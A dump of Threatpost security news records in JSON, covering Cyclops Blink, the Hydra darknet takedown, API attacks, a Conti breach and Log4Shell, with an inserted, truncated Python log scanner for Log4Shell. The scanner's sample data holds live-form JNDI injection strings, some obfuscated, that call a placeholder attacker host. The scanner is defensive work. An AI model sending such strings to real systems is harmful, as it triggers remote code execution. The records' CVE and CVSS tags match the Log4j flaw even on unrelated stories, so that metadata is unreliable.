cases, a device might be an end-of-life product and will no longer receive updates from its vendor. In such cases, an average user would not have the ability to fix a Cyclops Blink infection.\u201d\n\n_**Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T17:17:17", "type": "threatpost", "title": "Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T17:17:17", "id": "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "href": "https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:57:25", "description": "German authorities have taken down the Hydra marketplace \u2013 a popular destination on the Dark Web for trading in illicit goods and services, including cyberattack tools 
and stolen data.\n\nThis week, they were able to commandeer and take offline underpinning infrastructure such as servers, plus install a takedown banner in place of a working website, all while seizing $25 million (\u20ac23 million) in funds.\n\n\u201cThe illegal marketplace was a Russian-language Darknet platform that had been accessible via the Tor network since at least 2015,\u201d according to a [Tuesday statement](<https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2022/Presse2022/220405_PM_IllegalerDarknetMarktplatz.html>) from Frankfurt\u2019s public prosecutor (ZIT) and Germany\u2019s Federal Criminal Police Office (BKA). \u201cTheir focus was on trading in illegal narcotics. In addition, data spied out worldwide, forged documents and digital services were offered profitably via the platform.\u201d\n\nSecurity firm Elliptic said that it confirmed the seizure, which occurred on April 5 in a series of 88 transactions amounting to 543.3 BTC, according to [a post](<https://www.elliptic.co/blog/5-billion-darknet-market-hydra-seized-by-german-authorities>) about the Hydra crackdown on Tuesday. It also said that since its inception, Hydra has pulled in around $5 billion in Bitcoin.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/04/05135041/hydra-1-e1649181164284.png>)\n\nThe banner that site visitors now see. Source: BKA.\n\nThe takedown operation has been in motion since last August, according to the notice, and included cooperation from American authorities. The investigation found that Hydra had 17 million customer accounts and boasted more than 19,000 registered sellers, with a global turnover of $1.34 billion (\u20ac1.23 billion) in 2020 alone. 
Finding that information was not easy, the agencies noted.\n\n\u201cIn particular, the Bitcoin Bank Mixer, a service for obfuscating digital transactions provided by the platform, made crypto-investigations extremely difficult for law enforcement agencies,\u201d the posting noted. In the end, they discovered that \u201cHydra\u2026was probably the illegal marketplace with the highest turnover worldwide.\u201d\n\nProsecutors are charging Hydra operators and administrators with: commercially operating a criminal trading platform on the internet; the commercial procurement or granting of an opportunity for the unauthorized purchase or the unauthorized sale of narcotics; and commercial money laundering.\n\n## **Cracking Down on Illegal Dark Markets**\n\nGiven their status as linchpins of the [Dark Web underground economy](<https://threatpost.com/inside-ransomware-economy/166471/>) for cybercriminals and narcotics traders alike, international authorities have continued to put effort into dismantling underground markets.\n\nOne of the earliest wins was the [dismantling of Joker\u2019s Stash](<https://threatpost.com/jokers-stash-carding-site-taken-down/162548/>) in late 2020. It was a popular cybercriminal destination that specialized in trading in payment-card data, offering millions of stolen credit and debit cards to buyers. Anyone purchasing the information can create cloned cards to physically use at ATMs or at in-store machines that aren\u2019t chip-enabled; or, they can simply use the information to buy things online. 
Law enforcement managed to disable its blockchain DNS sites as well as Tor addresses.\n\nThen last year, Europol [announced the takedown](<https://threatpost.com/europol-dismantling-underground-marketplace/162949/>) of DarkMarket, which according to the law enforcement agency was \u201cthe world\u2019s largest illegal marketplace on the Dark Web.\u201d\n\nDarkMarket served as a marketplace for cybercriminals to buy and sell drugs, counterfeit money, stolen or counterfeit credit card data, anonymous SIM cards and malware. According to Europol, DarkMarket had almost 500,000 users and more than 2,400 sellers at the time of closure.\n\nIn addition, \u201cseveral darknet services have also voluntarily closed down over the winter of 2021-22,\u201d according to Elliptic.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T17:53:47", "type": "threatpost", "title": "Authorities Fully Behead Hydra Dark Marketplace", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-05T17:53:47", "id": "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "href": "https://threatpost.com/authorities-hydra-dark-marketplace/179240/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:41", "description": "In late July 2021, online retailers got hit with a jaw-dropping 2,800 percent increase in attack takeovers. Dead-set on gift card fraud via \u201cscrape for resale\u201d and other types of fraud, the attacks spiraled up to the rate of 700,000 attacks per day.\n\nIn a separate case \u2013 of a loan application fraud attack \u2013 the threat actors used the sub accounts feature on public email domains such as Gmail to create 3,000 email addresses, which were then used to submit roughly 45,000 fraudulent loan applications distributed across multiple IP addresses.\n\nBoth are examples of [API attacks](<https://www.reblaze.com/wiki/api-security/what-is-an-api-attack/>): attacks that prey on application programming interfaces (APIs) that \u201chave become the glue that holds today\u2019s apps together.\u201d as Cequence SecurityHacker-in-Residence Jason Kent explained for Threatpost in his August 2021 InfoSec Insider [article](<https://threatpost.com/top-3-api-vulnerabilities-cyberattackers/169048/>) on the top 3 API security vulnerabilities and how cyberattackers use them to pwn apps.\n\n\u201cThere\u2019s an API to turn on the kitchen lights while still in bed. There\u2019s an API to change the song playing on your house speakers. 
Whether the app is on your mobile device, entertainment system or garage door, APIs are what developers use to make applications function,\u201d Kent wrote.\n\n## How API Glue Sticks\n\nKent explained that APIs are attractive to both developers and attackers because they can operate much like a URL might operate: \u201cTyping \u2018www.example[.]com\u2019 into a web browser will elicit a response from example.com. Search for your favorite song and you will see the following in the URL bar: \u2018www.example.com/search?{myfavoritesong},\u2019\u201d he wrote. \u201cThe page result is dynamically built to present you with your search findings.\n\n\u201cYour mobile banking app operates in the same manner, with the API grabbing your name, account number and account balance \u2013 and populating the fields in the pre-built pages accordingly. While APIs have similar characteristics to web applications, they are far more susceptible to attacks; they include the entire transaction, including any security checks, and are typically communicating directly to a back-end service.\u201d\n\nThese issues aren\u2019t new, he said: \u201cIn the late 1990s folks figured out that you could often drop a single quote (\u2018) into a search box or login field and the application would respond with a database error. Understanding SQL database syntax means that a vulnerable application was simply a wide-open application that one could potentially have total control over. And once found, SQL vulnerabilities were often attacked.\u201d\n\nHistory keeps repeating itself, but threat actors\u2019 abuse of APIs keeps evolving. Cequence \u2013 which markets its API Security Platform \u2013 accordingly keeps tabs on trends in API abuse.\n\n## API Security Threat Report\n\nLast week, Cequence released its \u201cAPI Security Threat Report: Bots and Automated Attacks Explode,\u201d revealing that both developers and attackers are head over heels in love with APIs, for better or worse. 
Of the 21.1 billion transactions analyzed by Cequence Security in the last half of 2021, 14 billion (70 percent) were API transactions, the firm said in a [press release](<https://www.cequence.ai/news/cequence-security-releases-report-revealing-top-3-attack-trends-in-api-security/>) announcing the report ([PDF](<https://www.cequence.ai/wp-content/uploads/2022/03/Cequence-Threat-API-Security.pdf>)).\n\nKent dropped in on the Threatpost podcast last week to talk about the following three attack trends that Cequence highlighted in its recent report:\n\n * **Gift card fraud, loan fraud and payment fraud,** such as the two attacks on retailers described above.\n * **More sophisticated shopping bots,** with bots-as-a-service (BaaS) allowing anyone to buy, rent and subscribe to a network of malicious bots and use it to acquire high-demand items. Bots drove traffic to 36M (1,200 percent) to 129M (4,300 percent) above normal, with up to 86 percent of the transactions being malicious.\n * **The account takeover cat-and-mouse game.** \u201cAttack patterns went from massive in nature, with malicious ATOs making up 80% of the login traffic, to the polar opposite pattern of low, slow and perfectly formed transactions,\u201d according to Cequence.\n\n## Fending Off API Attacks\n\nIn our interview, Kent also offered advice for organizations to detect these API attacks, with an emphasis on machine-learning models.\n\nBut the most important element of defense is discovery, he stressed: \u201cYou have to know what you have. It\u2019s the foundation and the basis of every security paradigm and program,\u201d he said. \u201cKnowing which APIs you have, we\u2019re finding, is paramount for organizations.\n\n\u201cWe see things like, they\u2019ll move to Version 16 of their API. So their calls are slash new 16 slash login. But is 15 still on? Is 14 still on? Why am I still seeing traffic on one? 
Having that inventory of what\u2019s functioning and what\u2019s going on right now is becoming one of those things where organizations are seeing so much,\u201d he said.\n\nSeeing is believing. If your organization heeds his advice and delves into discovery, expect to see just how much attention threat actors are lavishing on APIs.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031722_Cequence_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nAs well, here\u2019s a link to an article by Kent that he discusses in the podcast, entitled [Gmail Farming and Credential Validation](<https://www.cequence.ai/blog/gmail-farming-and-credential-validation/>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:59", "type": "threatpost", "title": "Top 3 Attack Trends in API Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:59", "id": "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "href": "https://threatpost.com/top-3-attack-trends-in-api-security-podcast/179064/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T22:00:14", "description": "Meyer Corp., maker of Farberware and the largest cookware and bakeware distributor in the U.S., has begun notifying 2,747 employees that a cyberattack that occurred on Oct. 25 compromised their personal data.\n\nMeyer filed a notice with the state of Maine [disclosing the breach](<https://apps.web.maine.gov/online/aeviewer/ME/40/722270ba-5507-4ea4-88d7-b14961dc4c2d.shtml>), which it discovered on Dec. 1. And while the report given to the Maine Attorney General doesn\u2019t specifically name the culprit behind the attack, the Conti ransomware group had already announced on its leak site on Nov. 7 it was in possession of the employee data files, according to a report this week on the [cyberattack](<https://www.securityweek.com/cookware-distribution-giant-meyer-discloses-data-breach>).\n\nMeyer, based in Vallejo, Calif., was storing detailed information on its employees, including names, Social Security numbers, driver\u2019s license numbers and more, along with their name or other personal identifier. 
Other information that could now potentially be in the hands of the Conti ransomware operators includes drug screening results, immigration information and health and medical information.\n\nThe company didn\u2019t reveal many additional details of the strike, but it\u2019s worth noting that Meyer is just one of many companies breached by Conti\u2019s prolific ransomware operations.\n\n## **Conti\u2019s Prolific Ransomware Operations**\n\n\u201cRansomware groups such as Conti have been a thorn in the side of organizations from almost all industries and around the world,\u201d Erich Kron, security awareness advocate for KnowBe4, told Threatpost. \u201cAttacks such as this one by the Conti group are typically a ransomware type of attack that first steals the data, then encrypts it and holds the decryption key ransom.\u201d\n\nBut even if the company pays the demanded ransom, its employees, partners and customers remain vulnerable to subsequent shakedowns.\n\n\u201cIn addition, the groups generally threaten the victim organization with exposure of the stolen data, which can include customers, employees, financial information or intellectual property, among other things, if they do not pay,\u201d Kron said.\n\nJust this month, KP Snacks, a U.K.-based food giant, was [hit by Conti ransomware](<https://threatpost.com/kp-snacks-crumbs-ransomware-attack/178176/>), causing delays in deliveries across the country.\n\n## **Keeping Conti Out of Your Cloud**\n\nKeeping such sensitive data stored in the cloud is a common practice, but leaves companies vulnerable to attack if not properly secured, Amit Shaked, CEO of Laminar, explained in response to the Meyer breach.\n\n\u201cData is no longer a commodity, it\u2019s a currency \u2014 as this incident represents. Information within an organization\u2019s network is valuable to both businesses and attackers,\u201d Shaked said via email. 
\u201cThis incident also reminds us that with a majority of the world\u2019s data residing in the cloud, it is imperative that security becomes data-centric and solutions become cloud-native.\u201d\n\nFull integration with the cloud is also critical, Shaked added.\n\n\u201cSolutions need to be completely integrated with the cloud in order to identify potential risks and have a deeper understanding of where the data reside,\u201d he said. \u201cUsing the dual approach of visibility and protection, data protection teams can know for certain which data stores are valuable targets and ensure proper controls, which allows for quicker discovery of any data leakage.\u201d\n\nKeeping ahead of sophisticated groups like Conti [ransomware operators](<https://threatpost.com/lockbit-blackcat-swissport-ransomware-activity/178261/>) requires a clear, risk-based approach, Aaron Sandeen, CEO and co-founder of Cyber Security Works, added.\n\n\u201cIdeally, organizations should seek out near real-time vulnerability platforms that can centralize threat data and identify, investigate and rank vulnerabilities based on weaponization \u2013 a more effective approach than waiting for reports to be formalized, interpreted and delegated,\u201d advised Sandeen.\n\nBut beyond technical solutions, Kron added that strong security training for employees will also help keep cyberattackers, like Conti, at bay.\n\n\u201cBecause groups such as Conti and other bad actors use email phishing as a top method of gaining initial network access, it has never been more critical to foster a strong, good, security culture through security awareness training and regular simulated attacks.\u201d\n\n**_Join Threatpost on Wed. 
Feb 23 at 2 PM ET for a _**[_LIVE roundtable discussion_](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_, \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. _**[_REGISTER NOW_](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ and please Tweet us your questions ahead of time @Threatpost so they can be_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T20:41:48", "type": "threatpost", "title": "Cyberattackers Cook Up Employee Personal Data Heist for Meyer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T20:41:48", "id": "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "href": 
"https://threatpost.com/cyberattackers-employee-personal-data-meyer/178570/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:11:40", "description": "An excruciating, easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s being exploited in the wild.\n\nThe flaw first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, on Thursday. The sites [reportedly](<https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/>) warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages.\n\nThe same day, the as-yet-unpatched flaw was dubbed \u201cLog4Shell\u201d by [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) and began being tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>).\n\nBy early Friday morning, the Computer Emergency Response Team (CERT) of the Deutsche Telekom Group [tweeted](<https://twitter.com/DTCERT/status/1469258597930614787>) that it was seeing attacks on its honeypots coming from the Tor network as threat actors tried to exploit the new bug:\n\n> \ud83d\udea8\u26a0\ufe0fNew #0-day vulnerability tracked under \"Log4Shell\" and CVE-2021-44228 discovered in Apache Log4j \ud83c\udf36\ufe0f\u203c\ufe0f We are observing attacks in our honeypot infrastructure coming from the TOR network. 
Find Mitigation instructions here: <https://t.co/tUKJSn8RPF> [pic.twitter.com/WkAn911rZX](<https://t.co/WkAn911rZX>)\n> \n> \u2014 Deutsche Telekom CERT (@DTCERT) [December 10, 2021](<https://twitter.com/DTCERT/status/1469258597930614787?ref_src=twsrc%5Etfw>)\n\nDitto for [CERT New Zealand](<https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/>); and all day, people have piped up on Twitter to warn that they\u2019re also seeing in-the-wild exploits.\n\nThis problem is going to cause a mini-internet meltdown, experts said, given that Log4j is incorporated into scads of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid and Apache Flink. That exposes an eye-watering number of third-party apps that may also be vulnerable to the same type of high-severity exploit as the one spotted in Minecraft, as well as cloud services such as Steam and Apple iCloud, LunaSec warned.\n\nAs of Friday, version 2.15.0 had been released: log4j-core.jar is available on Maven Central [here](<https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/>), with release notes [available here](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0>) and Apache\u2019s Log4j security announcements [available here](<https://logging.apache.org/log4j/2.x/security.html>).\n\n## **\u2018Mini-Internet Meltdown\u2019 Imminent?**\n\nEven though an initial fix was rushed out on Friday, it\u2019s going to take time to trickle down to all of those projects, given how extensively the logging library is incorporated downstream.\n\n\u201cExpect a mini-internet meltdown soonish,\u201d said British security specialist Kevin Beaumont, who [tweeted](<https://twitter.com/GossiTheDog/status/1469255367049756676>) that the fix \u201cneeds to flow downstream to Apache Struts2, Solr, Linux distributions, vendors, appliances etc.\u201d\n\nJust one example of the bug\u2019s massive reach: On Friday morning, Rob Joyce, director of 
cybersecurity at the National Security Agency (NSA), [tweeted](<https://twitter.com/NSA_CSDirector/status/1469305071116636167>) that even the NSA\u2019s [GHIDRA](<https://ghidra-sre.org/>) \u2013 a suite of reverse-engineering tools developed by NSA\u2019s Research Directorate \u2013 includes the buggy Log4j library.\n\n> \u201cThe Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA\u2019s GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure.\u201d \u2014 _Rob Joyce, NSA Director of Cybersecurity._\n\n## Max CVSS Score of 10\n\nThe bug find has been credited to Chen Zhaojun of Alibaba. It\u2019s been assigned the [maximum CVSS score of 10](<https://logging.apache.org/log4j/2.x/security.html>), given how relatively easy it is to exploit, attackers\u2019 ability to seize control of targeted servers and the ubiquity of Log4j. According to CERT Austria, the security hole can be exploited by simply logging a special string.\n\nResearchers told Ars Technica that Log4Shell is a Java deserialization bug that stems from the library making network requests through the Java Naming and Directory Interface (JNDI) to an LDAP server and executing any code that\u2019s returned. It\u2019s reportedly triggered inside of log messages with use of the ${} syntax.\n\n\u201cJNDI triggers a look-up on a server controlled by the attacker and executes the returned code,\u201d according to CERT Austria\u2019s advisory, posted Friday, which noted that code for an exploit proof-of-concept (PoC) was [published on GitHub](<https://github.com/tangxiaofeng7/apache-log4j-poc>).\n\nThe internet\u2019s reaction: \u201cUmm, yikes.\u201d\n\n\u201cThis Log4j (CVE-2021-44228) vulnerability is extremely bad,\u201d [tweeted](<https://twitter.com/MalwareTechBlog/status/1469289471463944198>) security expert Marcus Hutchins. 
\u201cMillions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.\u201d\n\n## Javageddon\n\nSecurity researchers don\u2019t want to say that the sky is falling, per se, but, well, it is. They\u2019re comparing this scenario to Shellshock with regards to its huge potential severity. Also known as [Bashdoor](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>), Shellshock was a family of security bugs in the Unix Bash [shell](<https://en.wikipedia.org/wiki/Shell_(computing)>) present in almost all Linux, UNIX and Mac OS X deployments. Within hours of its initial disclosure in 2014, it was being exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning.\n\nSecurity researchers are considering Log4Shell to be much like Shellshock with regards to the enormous attack surface it poses. John Hammond, senior security researcher at Huntress, who created [a PoC](<https://twitter.com/_JohnHammond/status/1469255402290401285>) for Log4Shell, predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data.\n\n\u201cOrganizations are already seeing signs of exploitation in the wild, and adversaries will just spray-and-pray across the internet,\u201d he told Threatpost via email on Friday. 
This isn\u2019t a targeted attack, he noted, given that \u201cthere is no target.\u201d\n\nHe recommended that organizations actively using Apache log4j \u201cabsolutely must upgrade to log4j-2.1.50-rc2 as soon as possible.\u201d\n\nHammond shared this [growing list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of software and components vulnerable to Log4Shell that\u2019s being cultivated on GitHub.\n\n## Affected Versions\n\nOn Thursday, [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) explained that affected versions are 2.0 <= Apache log4j <= 2.14.1.\n\nIt added that JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren\u2019t affected by the LDAP attack vector, given that in those versions, \u201ccom.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load a remote codebase using LDAP.\u201d\n\nExploitability also depends on specific configurations, but a newer JDK is not a fix: there are \u201cother attack vectors targeting this vulnerability which can result in RCE,\u201d LunaSec continued. \u201cDepending on what code is present on the server, an attacker could leverage this existing code to execute a payload,\u201d pointing to a [Veracode post](<https://www.veracode.com/blog/research/exploiting-jndi-injections-java>) on an attack targeting the class org.apache.naming.factory.BeanFactory that\u2019s present on Apache Tomcat servers.\n\nLunaSec concluded that, \u201cgiven how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.\u201d\n\nOrganizations can tell if they\u2019re affected by examining log files for services using affected Log4j versions. 
If they contain user-controlled strings of that form \u2013 CERT NZ uses the example of \u201cJndi:ldap\u201d \u2013 the service has at least been probed and could be affected.\n\n\u201cIf you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,\u201d cybersecurity researchers at Randori [wrote in a blog post](<https://www.randori.com/blog/cve-2021-44228/>).\n\nChris Morgan, senior cyber threat intelligence analyst at Digital Shadows, noted that the fix shipped in Log4j version 2.15.0 reportedly changes a system setting from \u201cfalse\u201d to \u201ctrue\u201d by default.\n\nDon\u2019t change that, he warned: users who change the setting back to \u201cfalse\u201d remain vulnerable to attack, and as a result, \u201cit is highly recommended that this is not returned to its previous setting,\u201d he told Threatpost on Friday. \u201cGiven the scale of affected devices and exploitability of the bug, it is highly likely to attract considerable attention from both cybercriminals and nation-state-associated actors. 
Organizations are advised to update to version 2.15.0 and place additional vigilance on logs associated with susceptible applications.\u201d\n\n## Temporary Mitigation\n\nTo keep the library from being exploited, it\u2019s urgently recommended that Log4j versions are [upgraded](<https://logging.apache.org/log4j/2.x/security.html>) to 2.15.0.\n\nBut for those who can\u2019t update straight off, LunaSec pointed to a [discussion on HackerNews](<https://news.ycombinator.com/item?id=29507263>), posted in the early hours of Friday morning, regarding a mitigation available in Log4j 2.10.0 and higher: switch log4j2.formatMsgNoLookups to true by adding -Dlog4j2.formatMsgNoLookups=true to the JVM command for starting the application, or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true ([here are Apache\u2019s details](<https://issues.apache.org/jira/browse/LOG4J2-2109>)). The property did not exist before 2.10.0; on older versions it is silently ignored and gives no protection, so check which log4j-core version is actually on the classpath before relying on it.\n\nFor versions older than 2.10.0 that can\u2019t be upgraded, these mitigation choices have been suggested:\n\n * For Log4j 2.7 and later, modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files. Every appender\u2019s pattern must be changed, because a single layout still using plain %m leaves that log path exploitable; or,\n * For any 2.x version, substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, or remove that class from the log4j-core jar, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application\u2019s or stack\u2019s classloading documentation to understand this behavior.\n\n## How the Vulnerability Works\n\nThe Huntress ThreatOps team has published [details](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>) on the vulnerability\u2019s impact and advice on what organizations should do next. Expect it and other reports to be updated as the situation unfolds.\n\nHuntress researchers said that the attack vector is \u201cextremely trivial\u201d for threat actors. 
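One way to act on the log-review advice earlier in this article (CERT NZ's suggestion to look for strings like Jndi:ldap in the logs of affected services), as an added example that is not from the article, Huntress, CERT NZ or the Log4j project: a short Python scanner over constructed web-server log lines. It goes a step beyond the plain substring check, because Log4j resolves nested lookups such as ${lower:j} and the ${name:-default} form before the JNDI lookup runs, which is how attackers hide the jndi: prefix from naive grep rules. The scanner resolves that nesting the way Log4j's substitution would (a simplified model: only lower/upper and default values are handled; every other lookup is left as its literal body) and then reports the scheme and host of the callback. The log lines are constructed for this example and maliciousexternalhost.com is a placeholder, not an observed indicator.

```python
import re

# Constructed sample log lines (not from the article): source IP, request, status, user agent.
# The third and fourth lines hide the jndi: prefix behind nested lookups that Log4j resolves
# before the JNDI lookup runs, so a plain grep for the string jndi:ldap misses them.
SAMPLE_LOG = [
    '10.0.0.5 GET / 200 ua=Mozilla/5.0',
    '10.0.0.6 GET / 200 ua=${jndi:ldap://maliciousexternalhost.com/resource}',
    '10.0.0.7 GET / 200 ua=${${lower:j}ndi:${lower:l}dap://maliciousexternalhost.com/a}',
    '10.0.0.8 GET / 200 ua=${${::-j}${::-n}${::-d}${::-i}:rmi://maliciousexternalhost.com/b}',
    '10.0.0.9 GET / 200 ua=${env:HOME:-safe} nothing here',
]

# Innermost lookup: a ${...} whose body contains no further $, { or }.
INNER_LOOKUP = re.compile(r'[$][{]([^${}]*)[}]')
# Scheme and host of the callback once the lookup text has been flattened.
JNDI_CALLBACK = re.compile(r'jndi:([a-z]+)://([^/ }]+)', re.IGNORECASE)


def _resolve(body):
    # Simplified model of Log4j lookup resolution, enough to expose common obfuscation:
    #   ${lower:X} / ${upper:X}  -> case-mapped X
    #   ${name:-default}         -> default  (so ${::-j} becomes j)
    # Any other lookup is left as its literal body, so jndi:... surfaces for the detector.
    name, sep, default = body.partition(':-')
    if sep and not name.lower().startswith('jndi'):
        return default
    low = name.lower()
    if low.startswith('lower:'):
        return name[6:].lower()
    if low.startswith('upper:'):
        return name[6:].upper()
    return name


def normalize_lookups(text, max_rounds=32):
    # Resolve innermost lookups first, repeatedly, as Log4j does. Every round removes at
    # least one ${...} because _resolve never emits a new one; max_rounds is a guard.
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def extract_callback(normalized):
    # Return (scheme, host) of the attacker-controlled JNDI endpoint, or None.
    m = JNDI_CALLBACK.search(normalized)
    if not m:
        return None
    return m.group(1).lower(), m.group(2)


def scan_log(lines):
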